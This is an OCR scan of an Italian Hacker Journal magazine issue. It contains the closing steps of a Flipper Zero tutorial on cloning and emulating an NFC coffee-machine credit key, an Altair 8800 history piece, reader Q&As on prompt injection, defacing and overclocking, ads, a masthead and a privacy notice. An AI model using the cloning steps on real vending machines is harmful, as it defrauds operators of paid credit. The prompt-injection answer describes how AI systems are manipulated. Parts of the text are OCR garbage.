Tramite il pulsante More andiamo 
a salvare il nuovo file per poi 
emularlo direttamente sul 
distributore automatico. 


* Emuliamo la nostra chiavetta 
Avviciniamo il Flipper Zero al 
lettore NFC del distributore ed 
emuliamo il nostro file 
precedentemente salvato 
(percorso: Main Menu/NFC/ 
Saved/Nested_hj_hack/ 
Emulate). Il gioco è fatto! Sul 
display del distributore apparirà il 
credito presente sulla chiavetta 
del caffè al momento della sua 
clonazione: a questo punto la 
clonazione è avvenuta con 
successo e il distributore è stato 
hackerato! 


igura #5 


Ritorno alle impostazioni di default 


l'interazione con un lettore. Ma anche questo genera una 
desincronizzazione degli stati dei dati. Per sincronizzare gli 
stati, utilizzare la funzione Update From Initial Card. Se 
volessimo utilizzare nuovamente il Flipper Zero per una 
nuova emulazione sul distributore automatico, dovremmo 
innanzitutto ripristinare lo stato iniziale del file Nested_hj_ 
hack utilizzando la funzione Restore to original. 


pa 


(ROVOLOL 


Ti va 51b1616191920.10102010Y0+0110010sè 


MOroroivi 0. 
00001010 OLTO0LOT010: 1 
i Li pei” sa 


AL 
1EL00101FPP 


il 
nh: Por Ù 


(rene 
ui | )00+011010109 
| | 1010101( 


ito 


OIS1O0L10 | i ili 
I MINI 


i hi Lu 


; 


i 


Il nuto di riferimento per chi fa dell'hacking 
una filosofia di vita 


La crew di Hacker Journal ti aspetta ogni giorno sul nuovo sito Web, il ritrovo della sua ricca comunità hacker. 
Troverai anticipazioni degli articoli, news dal mondo della (in)sicurezza, contest, offerte speciali 
e un forum che vuole essere il punto di riferimento per chiunque voglia diventare un esperto di sicurezza. 


In un periodo storico in cui governi e multinazionali si divertono a spiare tutto e tutti, sulle pagine 
della rivista e sul sito scoprirai come difenderti e contrattaccare. #HJisBACK 


Forum: iscriviti subito e inizia a dialogare con la redazione e la comunità di HJ 


4 — ) News: le ultime notizie su cyberintrusioni, furti 
di credenziali, bug, malware e altro ancora 


Contest: metti alla prova le tue conoscenze 
con i giochi e le sfide della redazione 


Collezione HJ: i vecchi numeri della rivista, 
in PDF, da scaricare 


Invia un articolo: ti piace scrivere e hai un'idea 
originale per un articolo? Inviacela e la valuteremo! 


E il 1975 e la rivista Popular 
Electronics presenta l'Altair 
8800, un microcomputer 
sviluppato da Micro 
Instrumentation & Telemetry 
Systems (MITS), con sede ad 
Albuquerque, Nuovo Messico, 
USA. È un'innovazione che 
segna l'inizio di una nuova era: i 
computer personali diventano 
accessibili a un pubblico più 
ampio, non più limitati ai soli 
ambienti aziendali e universitari. 
Il MITS Altair 8800, valorizzato 
tra 439 e 621 dollari, è basato 
sul processore Intel 8080 e offre 
256 byte di memoria. È un 
computer che spiana la strada a 


una generazione di hacker 
dell'hardware, determinati a 
esplorare e sfruttare le 
potenzialità di questa nuova 
tecnologia. 


LA SCELTA DEL NOME 

Il nome “Altair 8800” nasce da 
una combinazione di 
circostanze e ispirazioni. 

Una versione racconta che il 
nome è suggerito dalla figlia di 
Les Solomon, redattore di 
Popular Electronics, ispirata da 
un episodio di Star Trek. Un'altra 
versione attribuisce la scelta del 
nome agli editori della rivista, 
desiderosi di un nome che 


L'interfaccia del MITS Altair 8800 era composta da LED e interruttori. 
Attraverso questi ultimi, posti sul pannello frontale, si doveva immettere 
una sequenza di istruzioni per completare l'avvio. 

Fonte: Maksym Kozlenko, Opera propria. 


> 58 


evochi un'idea “stellare”. 
Indipendentemente dalla sua 
origine, il nome Altair cattura 
l'immaginazione di una 
generazione e lascia 
un'impronta indelebile nella 
storia dell'informatica. 


L'ASSEMBLAGGIO 
Acquistare un Altair 8800 
significa ricevere un kit di 
componenti da assemblare, una 
sfida che richiede competenze 
tecniche avanzate. 

Il manuale di istruzioni sembra 
insufficiente, e molti acquirenti 
si affidano alla comunità 
crescente di altri utenti per 
risolvere problemi e condividere 
conoscenze. L'assemblaggio 
richiede cautela; un errore può 
compromettere l'intera 
macchina. 

Inoltre, la memoria limitata del 
kit base (solo 256 byte) impone 
ulteriori restrizioni, spingendo 
gli utenti a sviluppare e 
condividere soluzioni creative 
per estenderne le funzionalità. 


AVANZAMENTO 
TECNOLOGICO 

Gli hacker dell'hardware che 
lavorano sull’Altair 8800 non solo 


di dell’info 


espandono le capacità della 
macchina, ma contribuiscono 
anche a far avanzare l’intero 
settore dell'informatica. L'Altair 
8800, sebbene sia un sistema 
base, offre opportunità di 
espansione e personalizzazione. 
Gli utenti possono aggiungere 
schede di memoria, interfacce di 
input/output e altre componenti. 
Questa apertura alla modifica e 
personalizzazione stimola 
l'innovazione e pone le basi per lo 
sviluppo futuro di computer più 
potenti e versatili. 


IL LINGUAGGIO 

DI PROGRAMMAZIONE 
Parallelamente all'evoluzione 
hardware, si sviluppa anche quella 
del software. La programmazione 
inizia a diventare più accessibile 
grazie al BASIC, un linguaggio di 
programmazione sviluppato da 
John Kemeny, Bill Gates e Thomas 
Kurtz, che permette di impartire 


cker dell ‘hardware 


L'Altair 8800 


come prodotto 
“vaporware", un 
termine che 
(e[=X={elg\V(=No]goJo[o}us] 
informatici 
pubblicizzati 
prima delloro 
completamento 
effettivo. 


istruzioni ai calcolatori in inglese 
anziché nei codici binari. Questo 
cambiamento rende la 
programmazione più accessibile e 
apre la strada a una nuova ondata 
di innovazioni e sperimentazioni. 
Il successo commerciale dell'Altair 
8800 supera ogni aspettativa. 
Inizialmente, MITS spera di 
vendere solo alcune centinaia di 
unità, ma la domanda si rivela 
straordinariamente alta, con oltre 
2.000 ordini ricevuti, un numero 
senza precedenti per l'epoca. 
Questa inaspettata popolarità 
mette a dura prova le capacità 
produttive di MITS, che fatica a 
soddisfare la domanda. 
Nonostante i ritardi nelle 
consegne, i clienti sono disposti ad 
attendere, dimostrando la forte 
attrattiva del prodotto. Questa 
domanda spinge MITS a diventare 
un'azienda seria e ad ampliare la 
sua presenza pubblicitaria su 
diverse riviste di informatica. 


I PRIMI PASSI 

NEL RETAIL 

Dopo la pubblicazione degli articoli 
sull’Altair su Popular Electronics, 
diverse persone, come Dick Heiser, 
si ispirano a diventare rivenditori 
di Altair. Heiser apre Arrowhead 
Computers, uno dei primi negozi al 
dettaglio specializzati, vendendo 
computer Altair e libri correlati. È 
così che l’Altair 8800 apre la strada 
ai moderni computer personali, 
ma ispira anche una generazione 
di hacker dell'hardware, desiderosi 
di esplorare e spingere oltre i limiti 
della tecnologia dell'informatica. Il 
loro spirito di sperimentazione e 
innovazione, mosso da un mix di 
curiosità e sfida tecnica, 
contribuisce a plasmare il futuro 
dell'informatica e a gettare le basi 
per l'ascesa di giganti tecnologici 
come Microsoft. 

L'ALTAIR 8800 si rileva non solo un 
prodotto rivoluzionario nel suo 
tempo, ma dà anche vita a una 
sottocultura legata all'hardware 
che continua a influenzare 
l'evoluzione della tecnologia. Le 
loro scoperte, metodi e filosofie 
continuano a risuonare nel settore 
tecnologico odierno, dimostrando 
che l'’ALTAIR 8800 è molto più di un 
semplice computer: è il 
catalizzatore di un'era di 
cambiamento radicale 
nell'informatica e nella cultura 
hacker. 
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redazione@hackerjournal.it 


COS'È IL PROMPT 
LC INJECTION? 

Salve, ho letto sul Web che 
esiste una tecnica per gabbare 
l'intelligenza artificiale: il 
prompt injection. Mi spiegate 
in parole semplici di cosa si 
tratta? Grazie. 

Francesco 


1 Come tutti sanno, 
l'intelligenza artificiale ha 


fatto passi da gigante negli 
ultimi anni, trovando 
applicazioni in vari settori, dalla 
medicina all'ingegneria, dal 
marketing alla sicurezza 
informatica. Tuttavia, con 
l'evoluzione sono emerse anche 
nuove vulnerabilità. Una di 
queste è appunto il fenomeno 
noto come “Prompt Injection”. 
In parole semplici, è una tecnica 
mediante la quale un utente 
malintenzionato manipola 
l'input (il prompt) fornito a un 
sistema di IA, in particolare a 
quelli basati sul linguaggio 
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naturale, per indurre il sistema 
a comportarsi in modo non 
previsto o non autorizzato. 
Questo avviene inserendo 
comandi o sequenze di parole 
nell'input che possono 
confondere o dirottare il 
meccanismo di interpretazione 
del sistema. 

| sistemi di IA, infatti, 
specialmente quelli basati su 
algoritmi di apprendimento 
automatico e modelli di 
linguaggio, dipendono 
fortemente dai dati di input per 
le loro risposte. Quando un 
prompt è intenzionalmente 
strutturato per ingannare o 
confondere l'algoritmo, può 
portare a risposte inaspettate, 
errate o potenzialmente 
dannose. Questo può essere 
particolarmente problematico 
in sistemi che eseguono compiti 
critici, come quelli utilizzati in 
ambienti di sicurezza, 
assistenza sanitaria o finanza. 
Le implicazioni del Prompt 
Injection sono significative sia 
dal punto di vista della sicurezza 
che etico. Dal punto di vista 
della sicurezza, questa tecnica 
può essere utilizzata per 
bypassare controlli, estrudere 
dati sensibili o indurre il sistema 
a eseguire azioni non 


autorizzate. Dal punto di vista 
etico, può sollevare questioni 
riguardanti la manipolazione 
dell'informazione o la diffusione 
di contenuti. 


1? DEFACING: 
LC UNA MINACCIA CONCRETA 
PERISITI WEB? 
Spettabile Redazione, ho letto 
il vostro articolo sul defacing 
presente nello scorso numero. 
Mi chiedo: ma anche il mio 
sito personale realizzato con 
Wordpress potrebbe essere a 
rischio? 

Alessio 


1 Partiamo da una 
definizione stringata: il 


defacing di un sito Web è 
un'azione che comporta la 
modifica non autorizzata 
dell'aspetto visivo o del 
contenuto. Frequentemente, è 
utilizzato come strumento di 
protesta o vandalismo digitale e 
può avere impatti significativi 
sulla reputazione e 
sull’affidabilità, al di là della 
dimensione o della tecnologia 
usata per la costruzione. La 
risposta breve è dunque sì: 
anche un piccolo sito personale 
potrebbe essere a rischio. Anzi, i 
siti personali sono spesso a 


PROMPT INJECTION, DEFAGING E OVERCLOKING 
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e" 
rischio per vari motivi. Primo, 
potrebbero non avere livelli di 
sicurezza robusti, rendendoli 
bersagli più facili rispetto ai siti 
web aziendali con difese più 
sofisticate. Secondo, i proprietari 
di siti personali potrebbero non 
avere le competenze tecniche 
necessarie per implementare 
misure di sicurezza efficaci. 
Inoltre, potrebbero non ricevere 
la stessa attenzione regolare e la 
manutenzione che 
un'organizzazione potrebbe 
fornire ai suoi siti web. 

Gli attacchi di defacing 
solitamente sfruttano 
vulnerabilità nel software del 
sito web, come plugin o temi 
non aggiornati, configurazioni 
errate del server o sistemi di 
gestione dei contenuti (CMS) 
obsoleti. Gli aggressori possono 
anche utilizzare tecniche di 
ingegneria sociale per ottenere 
credenziali di accesso attraverso 
phishing o altri metodi 
fraudolenti. Per proteggere un 
sito da attacchi di defacing, è 
fondamentale adottare misure 
di sicurezza adeguate, come 
aggiornamenti regolari, backup 
frequenti, uso di password forti 
e uniche, utilizzo di strumenti di 
sicurezza come firewall e 
antivirus. 


OVERCLOCKING: 

Li QUESTO SCONOSCIUTO 
Salve, ho sempre sentito parlare 
di questa tecnica, ma non l'ho 
mai messa in pratica per paura 
di compromettere il sistema. Mi 
elencate i benefici e i rischi? E 
mi dite se ha ancora senso al 
giorno d'oggi? Grazie mille. 


Antonietta 


La domanda sull'opportunità 
di eseguire l'overclocking di 
una CPU dipende da vari fattori, tra 
cui le esigenze specifiche 
dell'utente, la configurazione 
hardware esistente e la tolleranza 
al rischio associato a tale pratica. 
Ecco alcuni punti da considerare: 
1) Le prestazioni: l'obiettivo 
principale dell'overclocking è 
aumentare la velocità del clock 
della CPU oltre le specifiche 
stabilite dal produttore. Questo 
può tradursi in prestazioni migliori, 
specialmente in attività che 
richiedono molta potenza di 
calcolo, come il gaming, l'editing 
video, o la simulazione scientifica. 
2) Rischio e stabilità: overcloccare 
una CPU può portare a un 
aumento del calore generato e, se 
non gestito correttamente, può 
ridurre la stabilità del sistema o 
danneggiare il processore. È 
fondamentale avere un buon 
sistema di raffreddamento e 
monitorare le temperature 
durante l'overclocking. 

3) Garanzia e durata: overcloccare 
una CPU spesso invalida la 
garanzia del produttore. Inoltre, 
l'overclocking può ridurre la durata 
prevista del processore a causa 
dell'aumento dello stress termico e 
fisico sul chip. 

4) Costo-Efficacia: per alcuni utenti, 


l'overclocking può essere un modo 
per ottenere prestazioni più 
elevate senza dover acquistare 
hardware più costoso. 

5) Esperienza e conoscenza: 
l'overclocking richiede una certa 
comprensione tecnica del 
funzionamento dei componenti del 
computer e della gestione termica. 
Gli utenti inesperti possono 
incorrere in problemi se non 
seguono le procedure corrette. 

6) Necessità effettive: se le attività 
quotidiane non richiedono 
un'intensa potenza di calcolo, 
l'overclocking potrebbe non 
apportare benefici tangibili. Inoltre, 
alcuni processori moderni sono già 
ottimizzati per offrire prestazioni 
eccellenti senza la necessità di 
overclocking. 

Per rispondere alla seconda parte 
della domanda, c'è da dire che, nel 
2023, la questione dell'overclocking 
di una CPU continua a essere 
rilevante, ma con alcune 
considerazioni aggiuntive rispetto 
al passato. Se si considerano le 
CPU moderne, infatti, che sono 
diventate più efficienti e potenti, 
con molti modelli che includono 
funzionalità di turbo boost o di 
auto-overclocking (funzionalità che 
permettono alla CPU di aumentare 
automaticamente la velocità del 
clock in base al carico di lavoro) si 
riduce di molto la necessità di un 
overclocking manuale. 


Hacker ourmnal sarà in edicola 


mag ea a Tal > 


Scopri perché è così apprezzato ogni. 
dalle forze di polizia ce 


Come funziona e come difendersi 
da questa tipologia di attacchi 


fetch( 


Un pericoloso bug si nasconde 


10 dei. mesi. dispari. 


Tutto quello che 
c'è di imperfetto 


nel broker MOTT Mosquitto sére bi di ‘ nella nuova tecnologia 


Il prezzo dell'abbonamento è calcolato in modo etico perché sia un servizio 
utile e non in concorrenza sleale con la distribuzione in edicola. 
Arretrati: si acquistano on-line suwww.sprea.it/arretrati 
abbonamenti@sprea.it Tel. 02 87168197 (lun-ven /9:00-13:00 e 14:00-18:00) 
O 3293922420 


Paolo Cionti: Tel. 02 92432253 - paolocionti@sprea.it 


5SOURNAL tor Ss it 


Grafici: Alessandro Bisquola, Tamara Bombelli, Nicole Bombelli, Nicolò Digiuni, 


Bimestrale - prezzo di copertina 3,90 € | i Marcella Gavinelli, Luca Patrian 
www.hackerjournal.it - redazione@hackerjournal.it Coordinamento: Chiara Civilla, Tiziana Rosato, Roberta Tempesta, Silvia Vitali 
La Divisione Informatica di Sprea edita anche: Amministrazione: Erika Colombo (responsabile), Silvia Biolcati, Irene Citino, 
WIN MAGAZINE + LINUX PRO Desirée Conti, Sara Palestra - amministrazione@sprea.it 
ILMIO COMPUTER IDEA Ufficio Legale: Francesca Sigismondi 


Brand Manager: Massimiliano Zagaglia 


Progetto grafico cover: Luca Patrian Hacker Journal, registrata al tribunale di Milano il 27/10/2003 con il numero 601. 


ISSN 1594-5774 


Realizzazione editoriale a cura di: Backdoor di Gianmarco Bruni Autorizzazione ROC n° 6282 del 29/08/2001 
Direttore responsabile: Luca Sprea 


Sprea S.p.A. Distributore per l’Italia: Press-Di Distribuzione stampa e multimedia s.r.. - 20090 Segrate 
Sede Legale: Via Torino, 51 20063 Cernusco Sul Naviglio (Mi) - Italia 
; PI 12770820152- Iscrizione camera Commercio 00746350149 Distributore per l'Estero: SO.DI.P S.p.A. Via Bettola, 18- 20092 Cinisello Balsamo (MI) 
Per informazioni, potete contattarci allo 02 87168197 Tel. +390266030400 - Fax +390266030269 - sies@sodip.it- www.sodip.it 
CDA: Luca Sprea (Presidente), Alessandro Agnoli (Amministratore Delegato), 
Giulia Spreafico (Divisione digita), Stefano Pernarella Stampa: Arti Grafiche Boccia S.p.A.- Via Tiberio Claudio Felice, 7- 84131 Salerno 


Copyright: Sprea S.p.A. 
Segreteria: Emanuela Mapelli - Tel. 02 92432244 - emanuelamapelli@sprea.it 

Informativa su diritti e privacy 

La Sprea S.p.A. è titolare esclusiva della testata Hacker journal e di tutti i diritti di pubblicazione e 
Sonia Lancellotti, Luca Majocchi: Tel. 02 92432295 diffusione in Italia. l'utilizzo da parte di terzi di testi, fotografie e disegni, anche parziale, è vieta- 
distribuzione@sprea.it  (® 351 5582739 to. l'Editore si dichiara pienamente disponibile a valutare — e se del caso regolare — le eventuali 

spettanze di terzi per la pubblicazione di immagini di cui non sia stato eventualmente possibile 

reperire la fonte. Informativa e Consenso in materia di trattamento dei dati personali GDPR 

Reg. UE 679/2016 e del Codice Privacy d.lgs. 196/03 cosi come modificato dalle disposizioni di 
Abbonamenti: si sottoscrivono on-line suwww.sprea.it/hackerjournal adeguamento alla Legge Italiana D.Lgs 101/2018. Nel vigore del GDPR Reg. UE 679/2016 e del 
abbonamenti@sprea.it Tel. 02 87168197 (lun-ven /9:00-13:00 e 14:00-18:00) Codice Privacy d.lgs. 196/03 cosi come modificato dalle disposizioni di adeguamento alla Legge 


Italiana D.Lgs 101/2018. artt. 24 e 25, è Sprea S.p.A. (di seguito anche “Sprea”), con sede legale 
in Via Torino, 51 Cemusco sul Naviglio (MI). Sprea S.p.a. tratta i dati identificativi e particolari 
eventualmente raccolti nell'esercizio della prestazione contrattuale. La stessa La informa che i 
Suoi dati eventualmente da Lei trasmessi alla Sprea S.p.a., verranno raccolti, trattati e conservati 
nel rispetto del decreto legislativo ora enunciato e nel pieno rispetto dell'art. 32 GOPR Reg. UE 
679/2016 per le finalità di trattamento previste per adempiere agli obblighi precontrattuali, 
contrattuali e fiscali derivanti da rapporti con Lei in essere, per le finalità amministrative e di 
contabilità, (con base giuridica contrattuale), per le finalità derivanti da obblighi di legge ed 
esercizio di difesa in giudizio, nonché per le finalità di promozione e informazione commerciale 
la cui unica base giuridica è basata sul consenso libero e incondizionato dell'interessato, nonché 
per le altre finalità previste dalla privacy policy consultabile sul sito www.sprea.it, connesse 
all'azienda. 
Si informa che, tenuto conto delle finalità del trattamento come sopra illustrate, il conferimento 
dei dati necessari alle finalità è libero ma il loro mancato, parziale o inesatto conferimento potrà 
avere, come conseguenza, l'impossibilità di svolgere l'attività e gli adempimenti precontrattuali 
e contrattuali come previsti dal contratto di vendita e /o fomitura di prodotti e servizi. 

La avvisiamo, inoltre, che i Suoi dati potranno essere comunicati e/o trattati (sempre nel rispetto 
della legge), anche all'estero, da società e/o persone che prestano servizi in favore della Sprea che 
sono state nominate responsabili del trattamento ai sensi dell'art- 28 GDPR Reg. VE 679/2016. 
Si specifica che non sono effettuati trasferimenti dei dati al di fuori dell'Unione Europea. Si speci 
fica che Sprea S.p.a non effettua trattamento automatizzato di informazione e dati che produca 
effetti giuridici che Lal riguardano o che incida in modo analogo significativamente sulla Sua 
persona.In ogni momento Lei potrà chiedere la l'accesso ai sui dati, la rettifica dei suoi dati, la 
cancellazione dei suoi dati, la limitazione al trattamento e la portabilità dei suoi dati, nonché poi 
esercitare la facoltà di opposizione al trattamento dei Suoi dati ovvero esercitare tutti diritti pre- 
visti dagli artt. 15, 16, 17, 18, 20, 21 del GOPR Reg. UE 679/2016 e ss. Modifiche di adeguamento 
legislativo del D.Lgs. 196/03, così come modificato dal D.Lgs 101/2018, mediante comunicazio- 
nescritta alla Sprea e/o direttamente al personale Incaricato preposto al trattamento dei dati. 

ei potrà altresì esercitare i propri diritti rivolgendosi al Garante della Privacy, con Sede in 
iazza Venezia n. 11 — 00187 Roma, Centralino telefonico: (+39) 06.696771,Fax: (+39) 
06.69677.3785. Per informazioni di carattere generale è possibile inviare una e-mail a: garan- 
te@gpdbp.it @pecit. 
Sprea S.p.a. La informa che Lei hail diritto, ai sensi dell'art. 7GDPR Reg. UE 679/2016 di revocare 
il consenso al trattamento dei suoi dati in qualsiasi momento. 
a lettura della presente informativa deve intendersi quale presa visione dell'Informativa ex art. 
13 D.Lgs. 196/03 e 13 GDPR Reg. UE 679/2016€ l'invio dei Suoi dati personali alla Sprea varrà 
quale consenso espresso al trattamento dei dati personali secondo quanto sopra specificato. 
‘invio di materiale (testi, fotografie, disegni, etc.) alla Sprea S.p.A. deve intendersi quale espressa 
autorizzazione alla loro libera utilizzazione da parte di Sprea S.p.A. Per qualsiasi fine e a titolo 
gratuito, e comunque, a titolo di esempio, alla pubblicazione gratuita su qualsiasi supporto 
cartaceo e non, su qualsiasi pubblicazione (anche non della Sprea S.p.A.), in qualsiasi canale di 
vendita e Paese del mondo. 


Il materiale inviato alla redazione non potrà essere restituito. 


GIAPPONE 


CON MENO DI 


\ dl | 


= cd 
CITTA | 
NON SOLO TOKYO 
WAKAYAMA... E LE IMPERDIBILI ISOLE! 


si — | 


È 
” 
= 
Va LT è 5 


CULTURA “Sly ba vio mal 


TUTTI GLI USI E COSTUMI DA CONOSCERE (BI OLTRE A SUSHI E RAMEN, TUTTI | PIATTI ss CINEMA, TEATRO, ANIMAZIONE: Ms 


PER RISPETTARE IL GALATEO LOCALE | | DELLA TRADIZIONE CHE DEVI CONOSCERE TUTTE LE FACCE DEL GENIO NIPPONICO 


LA GUIDA PER VOLARE NELLA TERRA DEL SOL LEVANTE Sned 


IL VOLUME CHE VI GUIDA ATTRAVERSO LA STORIA, 
LA CULTURA E I COSTUMI 
DI QUESTO AFFASCINANTE PAESE 


Acquistala su www.sprea.it/giappone 
disponibile anche in versione digitale 


Attacco al Desktop Windows da remoto 
Quattro possibili scenari con altrettante tipologie di attacco che è possibile 
realizzare sfruttando il Remote Desktop Protocol di casa Microsoft 


DDoS e Wiper malware 
Sono tra le principali tecniche messe in atto durante gli “scontri digitali" 
tra Russia e Ucraina. Ecco come funzionano e come difendersi 


Un'eredità eccessiva! 
OverlayFS permette di unire più cartelle creando file System virtuali. 
Il problema è che vengono ereditati troppi permessi 


Crypto-simmetria a blocchi di bit 
Come occultare un testo in chiaro, rendendolo visibile solo a chi possiede 
le credenziali giuste grazie a un software ad hoc 
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